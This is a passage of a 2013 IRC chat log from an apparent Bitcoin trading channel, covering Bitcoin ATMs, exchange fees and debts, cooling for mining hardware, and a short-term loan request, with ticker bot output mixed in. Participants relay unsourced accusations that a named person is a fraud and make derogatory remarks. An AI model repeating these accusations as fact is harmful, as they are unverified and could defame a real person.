bitcoins out or vice versa Mar 29 19:51:45 i still don't think bitcoin is adequate for the retail space Mar 29 19:51:48 you going to wait for confirmations if you buy knickers ? Mar 29 19:51:53 but that's an entirely set of problems from the bitmit thing Mar 29 19:51:57 no...green addresses Mar 29 19:52:02 Troic exactly. Mar 29 19:52:18 my point is...why make cash only places take debit cards? Mar 29 19:52:27 the atm can give you locally accepted currency Mar 29 19:52:33 while you hold mostly bitcoins Mar 29 19:52:45 i hate to be that ass who keeps linking his articles, but i hate repeating shit more. so MJR_III , ever saw http://trilema.com/2013/bitcoin-prices-bitcoin-inflexibility/#comment-92015 ? Mar 29 19:56:00 [HAVELOCK] [VTX] 2 @ 0.478 = 0.956 BTC [-] Mar 29 19:57:00 [HAVELOCK] [SDICE] 1 @ 0.465 BTC [+] Mar 29 19:57:44 i read it and i agree Mar 29 19:57:48 or just one way atms, bitcoin-central's idea, cards charged in local currency charged to your btc. Mar 29 19:57:55 but that is why i think that this does an end run around that problem Mar 29 19:58:04 your, hmm, i mean their Mar 29 19:58:13 cash is good for local Mar 29 19:58:26 but i don't want to hold my cash in bank, i want to hold bitcoins in my wallet Mar 29 19:59:21 the idea of an automatically adjusting exchange rate ATM that can be connected to a wallet is pretty trivial, the main issue is again exeecution Mar 29 20:00:15 ATM's are a pretty big business, access to currency is always going to be needed Mar 29 20:02:42 imagine the convenience of just getting cash when you need it, anytime, for in person retail transactions Mar 29 20:02:56 but holding your money and transferring for large transactions using the blockchain Mar 29 20:03:27 it would add a ton of liquidity if this atm network took off Mar 29 20:03:56 as people either choose to go buy some bitcoins by just depositing cash, or sell them because they need cash at the moment Mar 29 20:07:07 i imagine the practical way this will work will be the magic cash dispenser Mar 29 20:07:28 http://trilema.com/2013/the-free-cash-machine/ that thing Mar 29 20:07:54 exactly Mar 29 20:07:57 i read that one before Mar 29 20:08:05 be pretty cool thing to have Mar 29 20:08:13 but it may take a while. we're not quite able to make asics yet Mar 29 20:08:19 you could even...and this is maybe going above and beyond Mar 29 20:08:23 servicing atms is a few levels of complexity atop that Mar 29 20:08:45 you could have those machines also mining as they do their role of providing a convenient exchange Mar 29 20:08:58 and they have made, produced and shipped asics Mar 29 20:09:01 haha maybe Mar 29 20:09:06 avalon maybe Mar 29 20:09:42 at first of course, you would hve to have them inside a business... Mar 29 20:09:59 the point is that this space has already been explored...atm's are everywhere Mar 29 20:10:15 you could buy an atm, and then reconfigure it to accept bitcoins instead of debit cards Mar 29 20:10:22 atm's have cash in them Mar 29 20:10:27 no one wants you to have cash Mar 29 20:10:28 yes they would need to Mar 29 20:10:30 http://blog.smickles.com/2013/03/29/bloomberg-should-clean-up-their-act/ Mar 29 20:10:31 dead technology Mar 29 20:10:40 f-ing morons Mar 29 20:10:49 um...i think that the volume on the exchanges would beg to differ jcpham Mar 29 20:11:02 no one wants you to have cash Mar 29 20:11:06 cash is a dead technology Mar 29 20:11:13 ;;ticker Mar 29 20:11:14 BTCUSD ticker | Best bid: 88.89749, Best ask: 89.43408, Bid-ask spread: 0.53659, Last trade: 88.65000, 24 hour volume: 155385.63557232, 24 hour low: 75.00111, 24 hour high: 94.32000, 24 hour vwap: 86.37690 Mar 29 20:11:16 then why are so many people selling bitcoins? Mar 29 20:11:18 for USD Mar 29 20:11:27 every sale involves someone buying and someone selling Mar 29 20:11:34 so some people still want cash Mar 29 20:11:42 smickles lol that girl looks like she has no neck Mar 29 20:11:46 or should I say USD that they can withdraw as cash Mar 29 20:11:49 until it is illegal Mar 29 20:11:52 then no one wants it Mar 29 20:11:54 buying cash is still a way to use bitcoin Mar 29 20:12:05 smickles: exactly Mar 29 20:12:08 cash is my method for getting bitcoin Mar 29 20:12:13 cash works now Mar 29 20:12:16 jcpham i thought you mined Mar 29 20:12:17 but not in the future Mar 29 20:12:21 that too Mar 29 20:12:27 mircea_popescu: people on tv tend to look odd Mar 29 20:12:30 i don't think the dollar is going anywhere for a long time Mar 29 20:13:02 mircea_popescu: aslo, to me, it looks like she painted herself derpy eyes Mar 29 20:13:08 and as mircea_popescu's excellent article showed...you don't need bitcoin to do everything Mar 29 20:13:18 smickles lol i think hr mom painted those Mar 29 20:13:20 let it do what it is good at doing Mar 29 20:13:29 and use cash for what it is good for Mar 29 20:13:39 im with that. Mar 29 20:13:44 i pay for undies in cash to this day Mar 29 20:13:52 cash sucks as a store of value, but it is pretty convenient for in person local transactions Mar 29 20:14:05 mircea_popescu: ah, right. It is a production. The probably do have people do it for her Mar 29 20:14:29 cash sucks for sending money long distances, let bitcoin do that Mar 29 20:14:34 MJR_III kinda what it was intended as, you know ? little notes saying you have gold somewhere Mar 29 20:14:43 yes Mar 29 20:14:45 exactly Mar 29 20:15:02 you can turn cash into a reserve note for bitcoins in a way Mar 29 20:15:25 it is a proxy like all currency Mar 29 20:15:50 so no, bitcoin isn't killing fiat. Mar 29 20:15:55 it's just going to give it a 2nd youth Mar 29 20:15:59 yes Mar 29 20:16:03 as backed by bitcoin, i can see a use for usd/eur/etc Mar 29 20:16:04 [BTCTC] [RSM] 1 @ 0.00301 BTC [-] Mar 29 20:16:08 i agree Mar 29 20:16:14 it will basically undo bretton woods Mar 29 20:16:29 as people use it to peg the dollar to something scarce Mar 29 20:16:49 yup Mar 29 20:16:55 they can then see the real fluctuations in its value Mar 29 20:17:00 yup Mar 29 20:17:08 soon enough will be a topic in elections Mar 29 20:17:18 "this govt's policy has seen our currency drop 40% against btc" Mar 29 20:17:19 yes i agree Mar 29 20:17:36 real value, money is not able to be inflated artificially Mar 29 20:17:45 there needs to be a good or service backing it up Mar 29 20:17:59 like HFT trading on an exchange? Mar 29 20:18:12 redundant T ftw Mar 29 20:18:17 exchanging one proxy for another Mar 29 20:18:19 jcpham wait. what ? you mean on gox ? Mar 29 20:18:27 with 6 minute delays ? hft ? srsly ? Mar 29 20:18:32 lol Mar 29 20:18:38 is gox still broken Mar 29 20:18:41 i dunno Mar 29 20:18:43 until there is a better exchange, AND all exchanges communicate with each other Mar 29 20:18:52 you won't have efficiencies Mar 29 20:18:54 i've been building a porch all week Mar 29 20:19:13 [BTCTC] [RSM] 1 @ 0.00301 BTC [-] Mar 29 20:19:34 https://bitcointalk.org/index.php?topic=99497.msg1700739#msg1700739 Mar 29 20:19:36 MJR_III that is a good point actually. i have no idea why everyone's so hell bent on being special unique etc. Mar 29 20:19:37 I think I just pwned someone. Mar 29 20:19:40 oh well =/ Mar 29 20:19:50 well... other than the obvious "cause they're 16yo aspies" Mar 29 20:19:56 mircea_popescu: yeah, it just takes trust, which comes down to good management Mar 29 20:20:13 there is a reason our world is the way it is Mar 29 20:20:35 its the sum of our choices, mostly made through individual rational choices Mar 29 20:20:58 >16yo aspies Mar 29 20:20:59 who? Mar 29 20:20:59 so...there is a reason i can buy something on one exchange and instantly sell it on another Mar 29 20:21:46 Diablo-D3 exchange ops Mar 29 20:21:53 mircea_popescu: but it is like mpex...someone has to do it, and let others build on it Mar 29 20:21:57 ahh Mar 29 20:22:12 similar to how you say that the whole world can't be hedging Mar 29 20:22:17 MJR_III so far even a fucking naming convention is impossible to contemplate, let alone implem,ent. Mar 29 20:22:26 at this rate we'll have a btc equiv for fix in 2050 Mar 29 20:22:35 we can use fix now though Mar 29 20:22:41 i am already working on an engine Mar 29 20:22:45 tbh fix kinda sucks, but yea Mar 29 20:22:49 at one exchange, who is insolvent Mar 29 20:22:49 well yeah Mar 29 20:22:51 its not great Mar 29 20:23:11 this is the thing about bitfloor Mar 29 20:23:19 it has the best model of all exchanges Mar 29 20:23:23 smickles the redeem codes was a sorta attempt, but meh. Mar 29 20:23:25 its the most convenient for me Mar 29 20:23:30 but so much debt Mar 29 20:23:34 yes of course Mar 29 20:23:39 again that comes down to execution Mar 29 20:23:47 and i think poor choices as far as resolving that Mar 29 20:23:48 i would use bitfloor more often if it weren't for that debt Mar 29 20:23:55 for example Mar 29 20:23:57 and they owe me ~15 btc Mar 29 20:23:58 the guy who runs it Mar 29 20:24:08 wants to pay back everything in btc while collecting fees in dollars Mar 29 20:24:15 which will never work Mar 29 20:24:16 ya. nonsense huh Mar 29 20:24:24 you either do what a real company would do Mar 29 20:24:29 and file bankruptcy Mar 29 20:24:33 much of bitfloor is opensourced Mar 29 20:24:34 the girl made a very good point as to the cost of financial ineptitude vs coding inavbility Mar 29 20:24:36 liquidate and pay back what you can Mar 29 20:24:37 on the forum Mar 29 20:24:48 or you work out a deal with the creditors Mar 29 20:24:57 charge your fees in btc for transactions Mar 29 20:25:04 and put a portion of them towards the debt Mar 29 20:25:08 there is kinda a defacto deal with the creditors Mar 29 20:25:10 makomk malaimo maximian midnightmagic MiningBuddy mircea_popescu MJR_ MJR_III mpexbot Mar 29 20:25:10 makomk malaimo maximian midnightmagic MiningBuddy mircea_popescu MJR_ MJR_III mpexbot Mar 29 20:25:15 yes Mar 29 20:25:21 listen MJR_III this fees stuff... think for a moment. no exchanger makes money. Mar 29 20:25:23 but he owed 250k now it is over a million Mar 29 20:25:25 and he did recently make a 1% payment Mar 29 20:25:30 you have cases with 10k a month which come to 200 btc. Mar 29 20:25:40 or you have mtgox, which clears about enough to cover its costs. Mar 29 20:25:48 mircea_popescu: how do you figure? Mar 29 20:25:52 ;;ticker Mar 29 20:25:53 BTCUSD ticker | Best bid: 89.03000, Best ask: 89.50999, Bid-ask spread: 0.47999, Last trade: 89.03000, 24 hour volume: 155306.17401255, 24 hour low: 75.00111, 24 hour high: 94.32000, 24 hour vwap: 86.37012 Mar 29 20:26:00 and really, because of his jurisdiction, he owes the usd value of the btc at the time of the theft Mar 29 20:26:08 MJR_III simply like this : i look at the immense fees. Mar 29 20:26:18 since there's no competition on fees its clearly not a profitable space. Mar 29 20:26:28 ;;calc 155306 * 86.37 * .004 Mar 29 20:26:28 53655.11688 Mar 29 20:26:41 there expenses are higher than 53k a day? Mar 29 20:26:47 a day ? Mar 29 20:26:56 that is their volume for the last 24 hours Mar 29 20:27:03 at current vwap Mar 29 20:27:07 MJR_III: do the 30day avg/30 Mar 29 20:27:17 i dont think theior avg is 150 a day. Mar 29 20:27:24 and this past month would't be the best indicator Mar 29 20:27:28 true Mar 29 20:27:30 but still Mar 29 20:27:36 well, it looks better now for sure. Mar 29 20:27:41 they make well over a million a month i think Mar 29 20:27:44 but take a 1year outlook, it's healthier Mar 29 20:27:49 good point Mar 29 20:27:52 let's do some rl math : Mar 29 20:27:55 i've been watching for a while Mar 29 20:28:02 and they have a ton of volume and very high fees Mar 29 20:28:16 and i believe that some of the fees is in dollars and some in btc...not sure how they work that out Mar 29 20:28:17 let me do some sql Mar 29 20:28:25 smickles: NICE Mar 29 20:28:27 ( 2400 salary + 2800 tax + 1500 fixed) * 5 = 30k usd in employee costs. Mar 29 20:28:35 ugh, it doesn't auto-ignore tiberiusiv Mar 29 20:29:03 ok... Mar 29 20:29:07 with you so far Mar 29 20:29:45 whatever you do for servers and the sysadmins etc Mar 29 20:29:45 but also...just because they are the best and have first mover advantage does not mean that they are running a good exchange Mar 29 20:30:03 fixed costs ate them alive all through 2012. Mar 29 20:30:15 [BTCTC] [BASIC-MINING] 25 @ 0.37 = 9.25 BTC [+] Mar 29 20:30:25 but this is the case of mtgox. be it as it may, in most spaces the top dog can at least pay his salt. Mar 29 20:30:26 yeah i could see that Mar 29 20:30:37 true Mar 29 20:30:39 think a little about the 10k a month and under exchanges. Mar 29 20:30:44 of course Mar 29 20:30:57 lower expenses though Mar 29 20:31:00 not really. Mar 29 20:31:00 one person runs bitfloor Mar 29 20:31:07 ya. and we've seen the costs of that. Mar 29 20:31:07 and he owns it Mar 29 20:31:11 well... Mar 29 20:31:15 fair point Mar 29 20:31:19 the thing is, it takes 9 months to get a child out of a woman. not negotiable. Mar 29 20:31:27 you run an exchange you need some people. not negotiable. Mar 29 20:31:27 but every exchange including mt gox and excluding mpex has been hacked Mar 29 20:31:32 17590762.3519516 btc volume this year, if i mathed correctly Mar 29 20:31:38 the guy that can do the job of 5 people is NOT cheaper than hiring the 5 people. Mar 29 20:31:45 this year being the past 365 days to the second Mar 29 20:31:52 nice Mar 29 20:31:59 smickles so over 1mn a month even ? Mar 29 20:32:20 ;;calc 17590762.3519516/12 Mar 29 20:32:21 1465896.86266 Mar 29 20:32:31 around 1.5 mil Mar 29 20:32:49 tiberiusiv: you don't like bitcoin magazine? Mar 29 20:33:00 MJR_III now think of the legal bills to defend that million. Mar 29 20:33:12 there are some costs true Mar 29 20:33:12 kk Mar 29 20:33:25 see, it's a mixed blessing. a year ago they made red ink but at least knew all the costs. Mar 29 20:33:32 trust me, i understand the problems with trying to get the scale you need to make things worthwhile Mar 29 20:33:40 today they make decent dough, but also need an entire arsenal at the ready. Mar 29 20:33:49 but most businesses have to invest ahead of the growth curvve Mar 29 20:34:39 like i always say, if you are not bullish on bitcoins, why start a company in this space Mar 29 20:35:20 so as with all entrepreneurial endeveavors, there is risk and up front costs Mar 29 20:35:26 Diablo-D3 i don't see them using a dc honestly. Mar 29 20:35:34 but that is the bet you want to make, if you believe you are right Mar 29 20:35:39 mircea_popescu: they already are Mar 29 20:35:39 if i were runningtheir outfit i'd rend out a warehouse with a good triphase line Mar 29 20:35:43 somethingthat had a crane or w/e Mar 29 20:35:44 just some shitty chinese ones Mar 29 20:36:06 tiberiusiv: so you suggest that he's a scammer b/c he's romainian and allows people to post pictures you don't like, i understand that. What would you suggest my course of action be based on this information? Mar 29 20:36:22 or whatever you call industrial power in english. 380 volt Mar 29 20:36:30 lol Mar 29 20:36:35 smickles is so polite Mar 29 20:36:39 mircea_popescu: you mean 400v on site? Mar 29 20:36:41 yeah Mar 29 20:36:44 [BTCTC] [RSM] 1 @ 0.00301 BTC [-] Mar 29 20:36:53 there's plenty of practically abandoned industrial space Mar 29 20:37:02 mircea_popescu: easier to just have 208v three phase and then bring it down to 48v dc Mar 29 20:37:06 mircea_popescu: you need triphase if you are going to have that much Mar 29 20:37:21 ><< a warehouse with a good triphase line <>< Mar 29 20:37:27 yep Mar 29 20:37:34 and just pile them in there, forget a dc. Mar 29 20:37:43 get an actual optic fiber link Mar 29 20:37:47 [BTCTC] [RSM] 1 @ 0.00301 BTC [-] Mar 29 20:37:48 that is what the data centers we use hve Mar 29 20:37:50 mircea_popescu: yeah, but all you're doing is making it into a DC Mar 29 20:37:54 which most cities you can have installed for w/e, 1k per meter or somesuch Mar 29 20:38:04 Diablo-D3 minus a lot of the overhead. i think at least. Mar 29 20:38:07 just napkinning here. Mar 29 20:38:16 no, you just need to recreate the overhead Mar 29 20:38:20 cooling is not cheap Mar 29 20:38:29 Diablo-D3: i was wondering about that today Mar 29 20:38:35 cooling costs Mar 29 20:38:42 you just... Mar 29 20:38:44 o i know! Mar 29 20:38:46 ok, so add the lack of a mainstream interview to evidence that he's a scammer Mar 29 20:38:51 you just dump nitro ice on the ground Mar 29 20:39:04 why has no one tried this? http://www.youtube.com/watch?v=PtufuXLvOok Mar 29 20:39:30 i've seen a submerged oil rig Mar 29 20:39:33 with my eyes Mar 29 20:39:35 tiberiusiv: kk, fraud does seem more apt than scammer Mar 29 20:39:35 but anyway, maybe you're right Diablo-D3, dc is the way to go Mar 29 20:39:39 not something i'd want to do Mar 29 20:39:47 yes, why has no one tried an oil rig for a miner? Mar 29 20:39:49 pretty messy to un-submerge Mar 29 20:40:00 MJR_III what;'s the benefit ? Mar 29 20:40:05 well you should probably never unsubmerge, or once a year Mar 29 20:40:11 they can get cpu's up to 8ghz Mar 29 20:40:13 tiberiusiv: I would be upset too if i had an operation the size of mpex and got left out of media attention Mar 29 20:40:24 vs 3ghz normally Mar 29 20:40:37 it won't interfere with the electrical operations but dissipates heat better Mar 29 20:40:42 to do gpu's you'd have to remove the fans Mar 29 20:40:46 yes Mar 29 20:40:51 so heatsink only Mar 29 20:40:58 i was thinking an asic though would be heatsink only Mar 29 20:41:05 i assume that oil dissipates more heat than air no matter what Mar 29 20:41:05 and then you pump the oil through a cooler Mar 29 20:41:09 tiberiusiv: i don't think he exaggerates, he just speaks of the notational numbers because they are bigger Mar 29 20:41:12 mircea_popescu: why do you think I'm working out a $250m plan thats all involving a DC? Mar 29 20:41:13 o THAT kind of oil rig Mar 29 20:41:20 hehehe Mar 29 20:41:23 seems like gpus would really heat up oil Mar 29 20:41:24 i was wtfing all to hell here thining you know... crude oil Mar 29 20:41:28 much more so than you think Mar 29 20:41:35 i'm sure they would Mar 29 20:41:39 but you can pump it through a cooler Mar 29 20:41:53 oh so the oil is cooled Mar 29 20:41:57 and i am almost certain you could clock them faster Mar 29 20:42:13 saying you COULD cool the oil i think in this example there was no need Mar 29 20:42:14 jcpham use a heat exchanger to power a little steam turbine Mar 29 20:42:16 gpu mining really should be dead at this point Mar 29 20:42:20 infinitr power Mar 29 20:42:21 tiberiusiv: I haven't noticed an exaggeration. Are you talking about something you saw in irc or on a webpage? Mar 29 20:42:23 no sense in it Mar 29 20:42:35 jcpham: i mean for a real industrial asic plant Mar 29 20:42:42 [MPEX] [S.MPOE] 2000 @ 0.00068292 = 1.3658 BTC [+] Mar 29 20:42:54 its a super simple chip at the end of the day Mar 29 20:43:04 and all that matters is clock cycles Mar 29 20:43:12 so just try to do more per second Mar 29 20:43:37 in fact...you wouldn't even need most of the stuff to be submerged Mar 29 20:43:54 just the asic...and use a raspberry pi or whatever as the controller...it could hold the blockchain etrc Mar 29 20:44:08 i wonder if it'd be practical to make your asic farm in a small siberian town Mar 29 20:44:11 and just aircool Mar 29 20:44:14 i wonder Mar 29 20:44:19 that could also work Mar 29 20:44:20 tiberiusiv: though, that market cap does seem high to me, it is consistant with the amount of buys from people other than mircea_popescu that I know of myself Mar 29 20:45:01 eh gtfo. facebook doesn't have a revenue model, is worth 100bn Mar 29 20:45:03 not sure if even cold siberian air would allow for the levels of ghz that oil would Mar 29 20:45:08 mpex makes money since day one, 50mn is too hig. Mar 29 20:45:16 bitch, you got it backwards. Mar 29 20:45:31 tiberiusiv: most of the activity happening when mircea_popescu is around, doesn't really indicate that mircea_popescu is the cause of said activity Mar 29 20:45:35 i wouldn't engage, you are giving him what he wants Mar 29 20:45:58 MJR_III lol engage, that word got ruined by startrek Mar 29 20:46:08 lol Mar 29 20:46:15 i like star trek somewhat Mar 29 20:46:24 only really original and next generation Mar 29 20:46:31 MJR_III not air. WATER! run a stream through your thing Mar 29 20:46:40 you could water cool too Mar 29 20:46:46 tiberiusiv: you don't think that activity could increase from other people in similar timezones to mircea_popescu ? Mar 29 20:46:55 but i think oil is the best heat dissapater Mar 29 20:47:02 tiberiusiv: which one of these is you? http://www.youtube.com/watch?v=rWiyonefHXo Mar 29 20:47:04 nah, water is like 4300 caloric capacity Mar 29 20:47:10 and any gain from siberian cold could be translated to oil Mar 29 20:47:17 acute heat dissapation Mar 29 20:47:25 the oil can actually touch the chip Mar 29 20:47:29 the water can't Mar 29 20:47:42 tiberiusiv: aslo, from what i've read of the polimedia financials, most of his money used to come from consulting Mar 29 20:48:48 how can that be true? Mar 29 20:48:57 surely there are business in romania Mar 29 20:49:01 so i think that at 6hz and above...you have to worry about the small times where the heat is still on the chip before the water can suck it up Mar 29 20:49:23 smickles: careful, if you keep disagreeing you will be poor Mar 29 20:49:28 smickles: or young Mar 29 20:49:55 MJR_III: if you notice, i granted him the fact that mircea_popescu is a fraud and asked him what i should do about it Mar 29 20:50:08 dude you should stop highlighting me for one Mar 29 20:50:12 ok, nvm you are rich Mar 29 20:50:29 tiberiusiv: our current president is from one of the most corrupt places in 'merica Mar 29 20:50:39 mircea_popescu did you know romania si the most corrupt place in europe Mar 29 20:50:44 since when ?! Mar 29 20:50:48 mircea_popescu did you know i can buy a judge for $500 Mar 29 20:50:54 eh get out. Mar 29 20:50:55 i read about it in this channel recently Mar 29 20:51:03 sorry no citations for sources, though Mar 29 20:51:08 LOL Mar 29 20:51:08 you'll have to trust me Mar 29 20:51:18 ok. can i have 2 ? Mar 29 20:51:24 and america is ripe for bashing, it does a lot of stupit shit Mar 29 20:51:32 sure does Mar 29 20:51:59 anyway, i'd say romania is about as corrupt as france. Mar 29 20:52:07 at the cost of waging war everywhere Mar 29 20:52:08 way behindplaces like spain or italy... or greece Mar 29 20:52:13 'everywhere' Mar 29 20:52:15 kinda ahead of whatever, austria Mar 29 20:54:13 anyways, i think if you could hash 2.5x as fast...you would be making a ton of money Mar 29 20:54:17 nc -v miku.acm.uiuc.edu 23 Mar 29 20:54:17 pic related : http://polimedia.us/dtng/c/src/13642337509.jpg Mar 29 20:54:20 coming from a country where our dear leader has a public assasination list, corruption doesn't sound all that bad Mar 29 20:57:33 tiberiusiv: that video looks decades old, is it still like that? Mar 29 20:58:23 tiberiusiv: how come that video has a bunch of comments saying that it's not like that anymore? Mar 29 20:59:22 i don't think poverty = corruption Mar 29 20:59:59 [HAVELOCK] [SDICE] 10 @ 0.44 = 4.4 BTC [-] Mar 29 21:00:45 Looking to borrow fiat on MtGox or Bitstamp! Mar 29 21:01:29 DeaDTerra1: how much? Mar 29 21:04:50 10k$ ish, btcx.se (where I work) are totally out of float, people just got their salaries and it's now a four day holiday in Sweden... Mar 29 21:05:05 we need to stack up some float as we are already zeroed and the weekend just started Mar 29 21:05:52 I think 10k is above my legal limit Mar 29 21:07:22 I can take lower amounts, as I said. We are zeroed :P I am quite desperate for any amount I can get my hands on. btcx will repay it on Monday/Tuesday when our wire hits MtGox Mar 29 21:09:45 https://bitcointalk.org/index.php?topic=160292.msg1700657#msg1700657 Mar 29 21:09:47 ahaha good 1 Mar 29 21:11:12 DeaDTerra1: what rate? Mar 29 21:11:42 Let me check with the CEO ^^ Mar 29 21:12:12 oh, this state doesn't have an amount limit Mar 29 21:12:31 or an interest rate limit if the rate is in a contract Mar 29 21:13:14 smickles: how is it in the jurisdiction of the state? Mar 29 21:13:21 thought it would be in japan Mar 29 21:13:56 MJR_III: i'm not sure how jurisdiction would play out, so i default to where I am Mar 29 21:14:03 makes sense Mar 29 21:14:24 We are willing to offer 0.5-1% for a loan from today to Monday/Tuesday when the wire hits out MtGox account. Mar 29 21:14:29 does it sound reasonable? Mar 29 21:15:45 It's not unreasonable, but not sufficient for me. Sorry Mar 29 21:17:00 maybe putting a btc ask for a slightly above mkt price may work naturally to attract fiat ? Mar 29 21:19:56 Okay no problem :), if you change your mind just pm me Mar 29 21:20:28 Would work if we actually had some bitcoins :P Mar 29 21:20:39 [MPEX] [S.MPOE] 17500 @ 0.0006742 = 11.7985 BTC [-] Mar 29 21:20:41 [MPEX] [S.MPOE] 800 @ 0.00067177 = 0.5374 BTC [-] Mar 29 21:20:52 We have sent out all our bitcoins to customers Mar 29 21:21:14 makes sense...so you can't fill new orders? Mar 29 21:21:16 Gox getting DDoSed? Mar 29 21:21:33 ZedsterX tux announced it 12 hours ago Mar 29 21:21:35 wouldn't it make sense to borrow btc then? Mar 29 21:21:43 nope, we get people who want to buy Bitcoins in Sweden, and we do not have float to buy bitcoins and send them out to the customers :9 Mar 29 21:21:44 thank ya sir Mar 29 21:21:48 no bitcoin no fiat 0.0 Mar 29 21:21:59 It would except we kind of do not want the exchange risk of borrowing BTC Mar 29 21:22:04 well they have fiat waiting on the wire Mar 29 21:22:15 well, we have Fiat tons of it, just not on mtgox :) Mar 29 21:22:16 DeaDTerra1: good point Mar 29 21:22:35 a future contract maybe... Mar 29 21:22:39 ;) Mar 29 21:22:51 hmmm.... Mar 29 21:22:54 pming you Mar 29 21:23:01 We have about 70k $ wire transfer on it's way to MtGox but due to bank holiday and easter it will not hit mtgox until after this weekend Mar 29 21:23:11 I will become that desperate tomorrow :P Mar 29 21:23:24 then I am thinking of just longing on bitfinex to hedge the risk and borrow BTC Mar 29 21:23:35 O_O Mar 29 21:23:42 is this bitmarket.eu rehash Mar 29 21:24:07 short term commercial paper is so far an emerging market Mar 29 21:24:17 DeaDTerra1: I have a proposal, pm me. Mar 29 21:24:21 but very interesting Mar 29 21:24:49 Yea, I would love to have a connect to future/option market Mar 29 21:25:00 so you can connect your backend and hedge all exchange risks Mar 29 21:25:02 DeaDTerra1: If you sent to the bank in Japan, they don't have any Easter holidays there. Mar 29 21:25:03 it would be really cool Mar 29 21:25:05 mpex? Mar 29 21:25:12 DeaDTerra1 and why don;t you ? Mar 29 21:25:42 a nm, no bitcoin i forgot. Mar 29 21:25:56 In our normal buisiness model this is not needed and also we do not have Bitcoins as our float but USD/SEK Mar 29 21:26:03 otherwise I would have Mar 29 21:26:08 interesting Mar 29 21:26:24 why do most exchanges collect fees in fiat... Mar 29 21:26:42 No they do not, but Swedish banks do and people just got their salary. The wire was sent yesterday so I expect it to reach Mtgod on monday/tuesday. Mar 29 21:26:54 revisting bitmarket.eu : Mar 29 21:26:56 "Unfortunately, without proper funding and with limited manpower running a project of this magnitude has proven to be very difficult. Recently, these problems caused for a group of users trouble and losses of funds. Ultimately, that's why we decided to shut down BitMarket.eu and stopped trading." Mar 29 21:26:58 ah ok Mar 29 21:27:00 that's a nice way to put it Mar 29 21:27:08 Didn't expect this volume :P, I guess it's the combination of everyone that wants in before the holidays and that they just got their salaries Mar 29 21:27:24 yeah, holiday weekends are interesting Mar 29 21:27:40 is gox down for anyone else? Mar 29 21:27:45 smickles: do you think that tax returns will inject more cash into the btc economy Mar 29 21:28:24 bugpowderr ddos Mar 29 21:28:31 but it opens to me Mar 29 21:28:35 right now Mar 29 21:28:39 i'im on it right now Mar 29 21:28:43 also ziggap .. dat is fucked eh? Mar 29 21:28:59 whats with all the ddos'ing lately Mar 29 21:29:49 MJR_III: yeah for sure Mar 29 21:29:49 re ziggap https://bitcointalk.org/index.php?topic=146611.msg1700531#msg1700531 Mar 29 21:31:28 good article Mar 29 21:31:36 management, management, management Mar 29 21:32:22 its a same Deprived doesn't hang out here Mar 29 21:32:29 yeah Mar 29 21:33:23 shame Mar 29 21:33:31 figured that's what you meant Mar 29 21:33:47 ;;ticker Mar 29 21:33:52 nooo Mar 29 21:33:59 I have Deprived my coinbr referall as a tip, and invited him here Mar 29 21:34:03 he said he'd consider it Mar 29 21:34:11 once his laptop was fixed Mar 29 21:34:39 have=gave Mar 29 21:34:50 nice Mar 29 21:35:08 i don't really like the bitcointalk forums, so i am glad you guys are here to tell me the best articles Mar 29 21:36:17 MJR_III : I was wrong about the diff retarget- my bad Mar 29 21:36:29 jborkl: no worries Mar 29 21:37:34 ;;calc 6695826.2825963*4 Mar 29 21:38:58 [HAVELOCK] [SDICE] 50 @ 0.445 = 22.25 BTC [+] Mar 29 21:46:40 bugpowderr tell him. i have. Mar 29 21:47:04 i sent him a message Mar 29 21:47:11 !ticker h HIM Mar 29 21:47:13 [HAVELOCK:HIM] 1D: 1.80000000 / 1.83999412 / 1.92000000 (17 shares, 31.27990000 BTC), 7D: 1.41000000 / 1.72493945 / 2.00000000 (180 shares, 310.48910090 BTC), 30D: 1.40000000 / 1.8649577 / 17.25000000 (715 shares, 1333.44475269 BTC) Mar 29 21:47:25 !ticker m S.mPoe Mar 29 21:47:27 [MPEX:S.MPOE] 1D: 0.00062187 / 0.00066672 / 0.00068292 (568576 shares, 379.08 BTC), 7D: 0.0006 / 0.00066359 / 0.00071369 (2166747 shares, 1,437.85 BTC), 30D: 0.0006 / 0.00073309 / 0.00078628 (17281635 shares, 12,669.03 BTC) Mar 29 21:50:59 [HAVELOCK] [SDICE] 3 @ 0.40001 = 1.2 BTC [-] Mar 29 21:51:01 [HAVELOCK] [SDICE] 5 @ 0.391 = 1.955 BTC [-] Mar 29 21:51:01 [HAVELOCK] [SDICE] 2 @ 0.39 = 0.78 BTC [-] Mar 29 21:57:47 [MPEX] [S.DICE] 3600 @ 0.00394014 = 14.1845 BTC [-] Mar 29 21:59:13 MJR_III: people tend to spend tax returns on stupid shit, and i'm sure there are plenty of people who consider bitcoins stupid shit Mar 29 22:02:05 [MPEX] [S.MPOE] 2109 @ 0.00068292 = 1.4403 BTC [+] Mar 29 22:02:07 [MPEX] [S.MPOE] 1300 @ 0.00068293 = 0.8878 BTC [+] Mar 29 22:02:07 [MPEX] [S.MPOE] 5000 @ 0.00068294 = 3.4147 BTC [+] Mar 29 22:02:09 [MPEX] [S.MPOE] 15191 @ 0.00068314 = 10.3776 BTC [+] Mar 29 22:03:47 lol Mar 29 22:04:10 Yah, people think "free money!" Let's roll the dice Mar 29 22:05:52 i plan to use my 'return' on my car loan Mar 29 22:06:10 you fuckers gave me about 5 grand in eic Mar 29 22:06:18 thanks :D Mar 29 22:06:18 ;;bids 0 Mar 29 22:06:45 no gribbbbber? Mar 29 22:06:58 ;;pet Mar 29 22:06:59 *purrrrrrrr* Mar 29 22:07:03 bugpowderr: no gox Mar 29 22:09:30 i wanna know the summed bids Mar 29 22:09:41 That wall at 76 must have put us over 10MM Mar 29 22:10:18 214000 Mar 29 22:10:45 76: 55000 Mar 29 22:10:50 (both in btc) Mar 29 22:10:55 ;;bids 0 Mar 29 22:10:59 [BTCTC] [COGNITIVE] 2 @ 0.131 = 0.262 BTC [-] Mar 29 22:12:26 [BTCTC] [BASIC-MINING] 2 @ 0.37 = 0.74 BTC [+] Mar 29 22:12:59 [HAVELOCK] [SDICE] 18 @ 0.39 = 7.02 BTC [-] Mar 29 22:13:00 [HAVELOCK] [SDICE] 1 @ 0.380112 BTC [-] Mar 29 22:13:01 [HAVELOCK] [SDICE] 2 @ 0.3700001 = 0.74 BTC [-] Mar 29 22:13:02 [HAVELOCK] [SDICE] 1 @ 0.37000001 BTC [-] Mar 29 22:13:03 [HAVELOCK] [SDICE] 1 @ 0.36 BTC [-] Mar 29 22:13:05 [HAVELOCK] [SDICE] 10 @ 0.355 = 3.55 BTC [-] Mar 29 22:13:06 [HAVELOCK] [SDICE] 17 @ 0.35 = 5.95 BTC [-] Mar 29 22:14:15 approaching minimum 24hr vwap... Mar 29 22:14:27 